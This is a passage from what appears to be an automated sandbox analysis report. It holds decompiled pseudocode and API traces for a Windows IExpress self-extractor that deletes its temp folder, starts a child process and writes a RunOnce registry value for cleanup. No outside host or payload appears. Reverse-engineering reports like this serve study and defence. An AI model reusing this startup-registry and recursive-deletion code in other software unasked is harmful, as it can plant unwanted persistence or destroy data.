                  • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F353FF
                  • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35431
                    • Part of subcall function 00F35253: RemoveDirectoryA.KERNELBASE(?,?,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352B8
                    • Part of subcall function 00F35253: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352BF
                    • Part of subcall function 00F35253: GetTempFileNameA.KERNEL32(?,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352E0
                    • Part of subcall function 00F35253: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352EE
                    • Part of subcall function 00F35253: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352F7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                  • API String ID: 1979080616-186922987
                  • Opcode ID: 44dd4907c3339419ac88e5d64bbff9722193dcb4fcdc5b90f6df7937d2c6d7ec
                  • Instruction ID: 2ffab74f21cbc230e4a451f4569d46a18ce1126572d71d9e745d8f1c1d2a4c1b
                  • Opcode Fuzzy Hash: 44dd4907c3339419ac88e5d64bbff9722193dcb4fcdc5b90f6df7937d2c6d7ec
                  • Instruction Fuzzy Hash: 8531F7B1B04B1867CB14EF65DC41ABE769BABC0FB0F54412AB442C3254DFB8CD42B652
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E00F321E7(CHAR* __ecx) {
                  				signed int _v8;
                  				char _v276;
                  				char _v280;
                  				char _v284;
                  				struct _WIN32_FIND_DATAA _v596;
                  				struct _WIN32_FIND_DATAA _v604;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t21;
                  				int _t36;
                  				void* _t46;
                  				void* _t61;
                  				void* _t62;
                  				void* _t63;
                  				CHAR* _t65;
                  				void* _t66;
                  				signed int _t67;
                  				signed int _t69;
                  
                  				_t69 = (_t67 & 0xfffffff8) - 0x254;
                  				_t21 =  *0xf38000; // 0xfdaca2c3
                  				_t22 = _t21 ^ _t69;
                  				_v8 = _t21 ^ _t69;
                  				_t65 = __ecx;
                  				_push(_t61);
                  				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                  					L10:
                  					_pop(_t62);
                  					_pop(_t66);
                  					_pop(_t46);
                  					return E00F36C20(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                  				} else {
                  					E00F31485( &_v276, 0x104, __ecx);
                  					_t58 = 0x104;
                  					E00F314BD( &_v280, 0x104, _t61, "*");
                  					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                  					_t63 = _t22;
                  					if(_t63 == 0xffffffff) {
                  						goto L10;
                  					} else {
                  						goto L3;
                  					}
                  					do {
                  						L3:
                  						_t58 = 0x104;
                  						E00F31485( &_v276, 0x104, _t65);
                  						if((_v604.ftCreationTime & 0x00000010) == 0) {
                  							_t58 = 0x104;
                  							E00F314BD( &_v276, 0x104, _t63,  &(_v596.dwReserved1));
                  							SetFileAttributesA( &_v280, 0x80); // executed
                  							DeleteFileA( &_v280); // executed
                  						} else {
                  							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                  								E00F314BD( &_v276, 0x104, _t63,  &(_v596.cFileName));
                  								_t58 = 0x104;
                  								E00F364E7( &_v280, 0x104, 0xf31111);
                  								E00F321E7( &_v284);
                  							}
                  						}
                  						_t36 = FindNextFileA(_t63,  &_v596); // executed
                  					} while (_t36 != 0);
                  					FindClose(_t63);
                  					_t22 = RemoveDirectoryA(_t65); // executed
                  					goto L10;
                  				}
                  			}

                  APIs
                  • FindFirstFileA.KERNELBASE(?,00F3895A,00F311C4,00F3895A,00000000,?,?), ref: 00F3224D
                  • lstrcmpA.KERNEL32(?,00F311C8), ref: 00F3227E
                  • lstrcmpA.KERNEL32(?,00F311CC), ref: 00F32292
                  • SetFileAttributesA.KERNELBASE(?,00000080,?), ref: 00F322EC
                  • DeleteFileA.KERNELBASE(?), ref: 00F322FA
                  • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00F32306
                  • FindClose.KERNEL32(00000000), ref: 00F32315
                  • RemoveDirectoryA.KERNELBASE(00F3895A), ref: 00F3231C
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                  • String ID:
                  • API String ID: 836429354-0
                  • Opcode ID: 27b79212b68df3ffe80f9819c1540c758efd3f205721126ab8a4f905e6164016
                  • Instruction ID: b836306064efd00120f5776ae24f12479c88cc8d127ef816f3d16a8fabe913ef
                  • Opcode Fuzzy Hash: 27b79212b68df3ffe80f9819c1540c758efd3f205721126ab8a4f905e6164016
                  • Instruction Fuzzy Hash: F63192716047449BC320EB64DC8DAEB73ADBBC4335F00492EB98586290EB389909E762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E00F33E45(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                  				signed int _v8;
                  				char _v524;
                  				long _v528;
                  				struct _PROCESS_INFORMATION _v544;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t20;
                  				void* _t22;
                  				int _t25;
                  				CHAR* _t39;
                  				signed int _t44;
                  				void* _t49;
                  				signed int _t50;
                  				intOrPtr _t53;
                  
                  				_t45 = __edx;
                  				_t20 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t20 ^ _t50;
                  				_t39 = __ecx;
                  				_t49 = 1;
                  				_t22 = 0;
                  				if(__ecx == 0) {
                  					L13:
                  					return E00F36C20(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                  				}
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                  				if(_t25 == 0) {
                  					 *0xf39a88 = E00F3613C();
                  					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                  					_t45 = 0x4c4;
                  					E00F34327(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                  					L11:
                  					_t49 = 0;
                  					L12:
                  					_t22 = _t49;
                  					goto L13;
                  				}
                  				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                  				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                  				_t44 = _v528;
                  				_t53 =  *0xf38948; // 0x0
                  				if(_t53 == 0) {
                  					_t34 =  *0xf39a6c; // 0x0
                  					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                  						_t34 = _t44 & 0xff000000;
                  						if((_t44 & 0xff000000) == 0xaa000000) {
                  							 *0xf39a6c = _t44;
                  						}
                  					}
                  				}
                  				E00F33F76(_t34, _t44);
                  				CloseHandle(_v544.hThread);
                  				CloseHandle(_v544);
                  				if(( *0xf39a74 & 0x00000400) == 0 || _v528 >= 0) {
                  					goto L12;
                  				} else {
                  					goto L11;
                  				}
                  			}

                  APIs
                  • CreateProcessA.KERNELBASE ref: 00F33E89
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F33E9F
                  • GetExitCodeProcess.KERNELBASE ref: 00F33EB2
                  • CloseHandle.KERNEL32(?), ref: 00F33EF2
                  • CloseHandle.KERNEL32(?), ref: 00F33EFE
                  • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F33F32
                  • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F33F3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                  • String ID:
                  • API String ID: 3183975587-0
                  • Opcode ID: 89f6d8b20d607d99889e6c9e5fc90e837b8426926622e26a8c561b4a74efbd2d
                  • Instruction ID: 6f87216b1c3f413b31fd34aa4b9f1f37baa82089a922e1a050f714ff2d2da841
                  • Opcode Fuzzy Hash: 89f6d8b20d607d99889e6c9e5fc90e837b8426926622e26a8c561b4a74efbd2d
                  • Instruction Fuzzy Hash: D431D17194020CABEB24DF26DC48FABB77EEB80730F2041A9F506D2160CA758E45FB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00F32A7E(struct HINSTANCE__* _a4, int _a12) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t4;
                  				void* _t6;
                  				intOrPtr _t7;
                  				void* _t9;
                  				struct HINSTANCE__* _t13;
                  				intOrPtr* _t18;
                  				signed char _t20;
                  				intOrPtr* _t22;
                  				void* _t23;
                  				void* _t25;
                  				intOrPtr _t33;
                  
                  				_t4 = GetVersion();
                  				if(_t4 >= 0 && (_t4 & 0x000000ff) >= 6) {
                  					_t13 = GetModuleHandleW(L"Kernel32.dll");
                  					if(_t13 != 0) {
                  						_t22 = GetProcAddress(_t13, "HeapSetInformation");
                  						if(_t22 != 0) {
                  							_t18 = _t22;
                  							 *0xf3a290(0, 1, 0, 0);
                  							 *_t22();
                  							if(_t25 != _t25) {
                  								_t18 = 4;
                  								asm("int 0x29");
                  							}
                  						}
                  					}
                  				}
                  				_t21 = _a12;
                  				_t19 = _a4;
                  				 *0xf39a88 = 0;
                  				if(E00F32B38(_a4, _a12, _t18) != 0) {
                  					_t9 = E00F32DAE(_t21); // executed
                  					_t23 = _t9; // executed
                  					E00F35165(0, _t19, _t22, _t23); // executed
                  					if(_t23 != 0) {
                  						_t33 =  *0xf3895a; // 0x0
                  						if(_t33 == 0) {
                  							_t20 =  *0xf39a6c; // 0x0
                  							if((_t20 & 0x00000001) != 0) {
                  								E00F31DC7(_t20, _t22, _t23);
                  							}
                  						}
                  					}
                  				}
                  				_t6 =  *0xf385c8; // 0x0
                  				if(_t6 != 0) {
                  					CloseHandle(_t6);
                  				}
                  				_t7 =  *0xf39a88; // 0x0
                  				return _t7;
                  			}

                  APIs
                  • GetVersion.KERNEL32(00000000,00000001,00000001,?,00F36B21,00F30000,00000000,00000001,0000000A), ref: 00F32A86
                  • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00F36B21,00F30000,00000000,00000001,0000000A), ref: 00F32AA1
                  • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00F32AB1
                  • CloseHandle.KERNEL32(00000000,?,?,00F36B21,00F30000,00000000,00000001,0000000A), ref: 00F32B21
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Handle$AddressCloseModuleProcVersion
                  • String ID: HeapSetInformation$Kernel32.dll
                  • API String ID: 62482547-3460614246
                  • Opcode ID: 63fc3c8a38c9b8845692b9089661ccf1ecf63ee737754f01e32cd2e92abab6ec
                  • Instruction ID: 2e4aebccb01c14f51372d67af6bb0b646d04458490168609de7c56fc7c68ca44
                  • Opcode Fuzzy Hash: 63fc3c8a38c9b8845692b9089661ccf1ecf63ee737754f01e32cd2e92abab6ec
                  • Instruction Fuzzy Hash: 8511C271B043095BDB606FA6AC98E6B7B5AEBC0774F080024F902C3250DE7CDC40B662
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00F35165(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                  				signed int _v8;
                  				char _v268;
                  				signed int _t9;
                  				signed int _t15;
                  				void* _t21;
                  				void* _t29;
                  				void* _t30;
                  				CHAR** _t32;
                  				void* _t33;
                  				signed int _t34;
                  
                  				_t22 = __ecx;
                  				_t21 = __ebx;
                  				_t9 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t9 ^ _t34;
                  				_push(__esi);
                  				_t32 =  *0xf39220; // 0x3429d00
                  				_push(__edi);
                  				while(1) {
                  					_t29 = _t32;
                  					if(_t32 == 0) {
                  						break;
                  					}
                  					if( *0xf38944 == 0 &&  *0xf39a70 == 0) {
                  						SetFileAttributesA( *_t32, 0x80); // executed
                  						DeleteFileA( *_t32); // executed
                  					}
                  					_t32 = _t32[1];
                  					LocalFree( *_t29);
                  					LocalFree(_t29);
                  				}
                  				_t15 =  *0xf38940; // 0x0
                  				_pop(_t30);
                  				_pop(_t33);
                  				if(_t15 != 0 &&  *0xf38944 == 0 &&  *0xf39a70 == 0) {
                  					_push(_t22);
                  					E00F3158C( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                  					if(( *0xf39a74 & 0x00000020) != 0) {
                  						E00F3654A( &_v268);
                  					}
                  					SetCurrentDirectoryA(".."); // executed
                  					_t22 =  &_v268;
                  					E00F321E7( &_v268);
                  					_t15 =  *0xf38940; // 0x0
                  				}
                  				if( *0xf39a80 != 1 && _t15 != 0) {
                  					_t15 = E00F31E1D(_t22); // executed
                  				}
                  				 *0xf38940 =  *0xf38940 & 0x00000000;
                  				return E00F36C20(_t15, _t21, _v8 ^ _t34, 0x104, _t30, _t33);
                  			}

                  APIs
                  • SetFileAttributesA.KERNELBASE(03429D00,00000080,00000000,00000000), ref: 00F3519D
                  • LdrResolveDelayLoadedAPI.NTDLL(03429D00), ref: 00F351A5
                  • LocalFree.KERNEL32(03429D00,00000000,00000000), ref: 00F351B0
                  • LocalFree.KERNEL32(03429D00), ref: 00F351B7
                  • SetCurrentDirectoryA.KERNELBASE(00F311CC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F35210
                  Strings
                  • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F351E1
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: FreeLocal$AttributesCurrentDelayDirectoryFileLoadedResolve
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                  • API String ID: 3787803824-2312194364
                  • Opcode ID: bdc79259598a25e89a5b2868b33ae0173b78ccd222394303a7b8c749c69e0564
                  • Instruction ID: 6dd35989ddd309896381f15d278300c28fdb653fcb2d56b233da813942eba00e
                  • Opcode Fuzzy Hash: bdc79259598a25e89a5b2868b33ae0173b78ccd222394303a7b8c749c69e0564
                  • Instruction Fuzzy Hash: FB216F31906608DBDB64AF50ED09B6A37A2FB84B75F040159E882531A0CFF89D85FB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F37360() {
                  
                  				SetUnhandledExceptionFilter(0xf37310); // executed
                  				return 0;
                  			}

                  APIs
                  • SetUnhandledExceptionFilter.KERNELBASE(00F37310), ref: 00F37365
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 788b65b5a634c91c29e4462a0f2a94c9074e88e95abc9008f05d87cbfd8ff7b0
                  • Instruction ID: 4b2f781f93d53ee7cf7e186b7fa8f62f7f9b2fb1d32ee74fad1e53af797a73dd
                  • Opcode Fuzzy Hash: 788b65b5a634c91c29e4462a0f2a94c9074e88e95abc9008f05d87cbfd8ff7b0
                  • Instruction Fuzzy Hash: B49002E0255208965A103B725C0944936916B48632F811C60A441C4055DA9180807913
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00F31E6B(int __edx) {
                  				signed int _v8;
                  				void _v267;
                  				char _v268;
                  				void _v527;
                  				char _v528;
                  				void* _v532;
                  				int _v536;
                  				int _v540;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t30;
                  				long _t38;
                  				long _t42;
                  				struct HINSTANCE__* _t47;
                  				signed int _t49;
                  				signed int _t50;
                  				signed int _t51;
                  				CHAR* _t55;
                  				signed int _t57;
                  				signed int _t62;
                  				int _t65;
                  				intOrPtr* _t72;
                  				signed int _t73;
                  				void* _t75;
                  				signed int _t76;
                  				void* _t80;
                  				intOrPtr* _t81;
                  				void* _t84;
                  				int _t85;
                  				struct HINSTANCE__* _t86;
                  				void* _t88;
                  				signed int _t90;
                  				signed int _t93;
                  				void* _t94;
                  				void* _t95;
                  
                  				_t79 = __edx;
                  				_t30 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t30 ^ _t93;
                  				_t67 = 0;
                  				_v268 = 0;
                  				memset( &_v267, 0, 0x103);
                  				_v528 = 0;
                  				memset( &_v527, 0, 0x103);
                  				_t95 = _t94 + 0x18;
                  				_t90 = 0;
                  				_t38 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v540); // executed
                  				if(_t38 != 0) {
                  					L24:
                  					return E00F36C20(_t38, _t67, _v8 ^ _t93, _t79, _t84, _t90);
                  				}
                  				_push(_t84);
                  				_t85 = 0;
                  				while(1) {
                  					E00F31524("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t85);
                  					_t95 = _t95 + 0x10;
                  					_t42 = RegQueryValueExA(_v532, "wextract_cleanup0", _t67, _t67, _t67,  &_v536); // executed
                  					if(_t42 != 0) {
                  						break;
                  					}
                  					_t85 = _t85 + 1;
                  					if(_t85 < 0xc8) {
                  						continue;
                  					}
                  					break;
                  				}
                  				if(_t85 != 0xc8) {
                  					_t67 = 0x104;
                  					GetSystemDirectoryA( &_v528, 0x104);
                  					_t79 = 0x104;
                  					E00F364E7( &_v528, 0x104, "advpack.dll");
                  					_t47 = LoadLibraryA( &_v528); // executed
                  					_t86 = _t47;
                  					__eflags = _t86;
                  					if(__eflags == 0) {
                  						L10:
                  						_t49 = GetModuleFileNameA( *0xf39164,  &_v268, _t67);
                  						__eflags = _t49;
                  						if(_t49 == 0) {
                  							L17:
                  							_t38 = RegCloseKey(_v532);
                  							L23:
                  							_pop(_t84);
                  							goto L24;
                  						}
                  						L11:
                  						_t72 =  &_v268;
                  						_t80 = _t72 + 1;
                  						do {
                  							_t50 =  *_t72;
                  							_t72 = _t72 + 1;
                  							__eflags = _t50;
                  						} while (_t50 != 0);
                  						_t73 = _t72 - _t80;
                  						__eflags = _t73;
                  						_t81 = 0xf39224;
                  						do {
                  							_t51 =  *_t81;
                  							_t81 = _t81 + 1;
                  							__eflags = _t51;
                  						} while (_t51 != 0);
                  						_t67 = _t73 + 0x50 + _t81 - 0xf39225;
                  						_t88 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xf39225);
                  						__eflags = _t88;
                  						if(_t88 != 0) {
                  							__eflags = _t90;
                  							 *0xf3856c = 0 | _t90 == 0x00000000;
                  							_t55 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                  							__eflags = _t90;
                  							if(_t90 == 0) {
                  								_t55 = "%s /D:%s";
                  							}
                  							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                  							E00F31524(_t88, _t67, _t55,  &_v268);
                  							_t75 = _t88;
                  							_t25 = _t75 + 1; // 0x1
                  							_t79 = _t25;
                  							do {
                  								_t57 =  *_t75;
                  								_t75 = _t75 + 1;
                  								__eflags = _t57;
                  							} while (_t57 != 0);
                  							_t76 = _t75 - _t79;
                  							__eflags = _t76;
                  							_t26 = _t76 + 1; // 0x2
                  							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t88, _t26); // executed
                  							RegCloseKey(_v532); // executed
                  							_t38 = LocalFree(_t88);
                  							goto L23;
                  						}
                  						_t79 = 0x4b5;
                  						__eflags = 0;
                  						E00F34327(0, 0x4b5, _t52, _t52, 0x10, _t52);
                  						goto L17;
                  					}
                  					_t62 = GetProcAddress(_t86, "DelNodeRunDLL32");
                  					asm("sbb esi, esi"); // executed
                  					FreeLibrary(_t86); // executed
                  					_t90 =  ~( ~_t62);
                  					if(__eflags == 0) {
                  						goto L10;
                  					}
                  					_t65 = GetSystemDirectoryA( &_v268, 0x104);
                  					__eflags = _t65;
                  					if(_t65 != 0) {
                  						E00F364E7( &_v268, 0x104, 0xf31111);
                  					}
                  					goto L11;
                  				}
                  				_t38 = RegCloseKey(_v532);
                  				 *0xf38570 = _t67;
                  				goto L23;
                  			}








































                  APIs
                  • memset.MSVCRT ref: 00F31E98
                  • memset.MSVCRT ref: 00F31EAC
                  • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,?,00000000), ref: 00F31ED7
                    • Part of subcall function 00F31524: _vsnprintf.MSVCRT ref: 00F31556
                  • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31F12
                  • RegCloseKey.ADVAPI32(?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31F33
                  • GetSystemDirectoryA.KERNEL32 ref: 00F31F51
                  • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31F70
                  • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00F31F82
                  • FreeLibrary.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31F8F
                  • GetSystemDirectoryA.KERNEL32 ref: 00F31FA1
                  • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31FCD
                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F32002
                  • RegCloseKey.ADVAPI32(?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F32025
                  • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,00000000), ref: 00F32080
                  • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F3208C
                  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F32093
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                  • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                  • API String ID: 178549006-3765599613
                  • Opcode ID: f0fe11c1ec8df4b7b69b1e7f9e4a22e7ef6f60d6c80365b71c010f8163897823
                  • Instruction ID: 1f14ea794bbe19f3da3a5d93e5bb9f050d88643a1eb01943523f8ba0fb255f7a
                  • Opcode Fuzzy Hash: f0fe11c1ec8df4b7b69b1e7f9e4a22e7ef6f60d6c80365b71c010f8163897823
                  • Instruction Fuzzy Hash: F75104B2A0020CAFDB259B24CC88FFA777DEB503B4F0441A4F985A2151DB75CE49BB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00F339F1() {
                  				signed int _v8;
                  				signed int _v12;
                  				char _v276;
                  				char _v280;
                  				short _v300;
                  				intOrPtr _v304;
                  				void _v348;
                  				char _v352;
                  				intOrPtr _v356;
                  				signed int _v360;
                  				short _v364;
                  				char* _v368;
                  				intOrPtr _v372;
                  				void* _v376;
                  				intOrPtr _v380;
                  				signed int _v384;
                  				signed int _v388;
                  				signed int _v392;
                  				signed int _v396;
                  				signed int _v400;
                  				signed int _v404;
                  				void* _v408;
                  				void* _v424;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t70;
                  				signed int _t77;
                  				void* _t78;
                  				signed int _t80;
                  				short _t95;
                  				signed int _t96;
                  				intOrPtr _t97;
                  				signed int _t100;
                  				signed int _t103;
                  				signed int _t107;
                  				int _t111;
                  				signed int _t114;
                  				signed char _t117;
                  				signed int _t118;
                  				signed int _t119;
                  				int _t121;
                  				void* _t124;
                  				signed int _t126;
                  				void* _t127;
                  				struct HINSTANCE__* _t128;
                  				void* _t129;
                  				short _t136;
                  				char* _t139;
                  				signed char _t143;
                  				signed char _t144;
                  				signed int _t148;
                  				void* _t149;
                  				void* _t150;
                  				signed int _t152;
                  				void* _t154;
                  				void* _t155;
                  				signed int _t156;
                  				signed int _t161;
                  				signed int _t163;
                  				void* _t164;
                  
                  				_t163 = (_t161 & 0xfffffff8) - 0x194;
                  				_t70 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t70 ^ _t163;
                  				_t126 = 0;
                  				_t152 = 0;
                  				 *0xf39a88 = 0;
                  				_t148 = 0;
                  				_v392 = 0;
                  				_v384 = 0;
                  				_t164 =  *0xf38948 - _t126; // 0x0
                  				if(_t164 != 0) {
                  					L5:
                  					_v388 = _t126;
                  					while(1) {
                  						_v400 = _v400 & 0x00000000;
                  						memset( &_v348, 0, 0x44);
                  						_t163 = _t163 + 0xc;
                  						_v348 = 0x44;
                  						__eflags =  *0xf38b62;
                  						if( *0xf38b62 != 0) {
                  							goto L28;
                  						}
                  						_t145 =  &_v396;
                  						_t114 = E00F34538("SHOWWINDOW",  &_v396, 4);
                  						__eflags = _t114;
                  						if(_t114 == 0) {
                  							L27:
                  							_push(0);
                  							_push(0x10);
                  							_push(0);
                  							_push(0);
                  							L4:
                  							_t145 = 0x4b1;
                  							E00F34327(0, 0x4b1);
                  							 *0xf39a88 = 0x80070714;
                  							L64:
                  							_t78 = 0;
                  							L65:
                  							_pop(_t149);
                  							_pop(_t155);
                  							_pop(_t127);
                  							return E00F36C20(_t78, _t127, _v12 ^ _t163, _t145, _t149, _t155);
                  						}
                  						__eflags = _t114 - 4;
                  						if(_t114 > 4) {
                  							goto L27;
                  						}
                  						__eflags = _v396 - 1;
                  						if(_v396 != 1) {
                  							__eflags = _v396 - 2;
                  							if(_v396 != 2) {
                  								_t136 = 3;
                  								__eflags = _v396 - _t136;
                  								if(_v396 == _t136) {
                  									_v304 = 1;
                  									_v300 = _t136;
                  								}
                  								L16:
                  								__eflags = _t126;
                  								if(_t126 != 0) {
                  									L29:
                  									_t154 = 1;
                  									__eflags = _t126 - 1;
                  									if(_t126 != 1) {
                  										L33:
                  										_t131 =  &_v280;
                  										_t77 = E00F31910( &_v280,  &_v408,  &_v404); // executed
                  										__eflags = _t77;
                  										if(_t77 == 0) {
                  											goto L64;
                  										}
                  										_t156 = _v404;
                  										__eflags = _t148;
                  										if(_t148 != 0) {
                  											L39:
                  											__eflags = _t156;
                  											if(_t156 == 0) {
                  												L59:
                  												_t150 = _v408;
                  												_t145 =  &_v352;
                  												_t129 = _t150; // executed
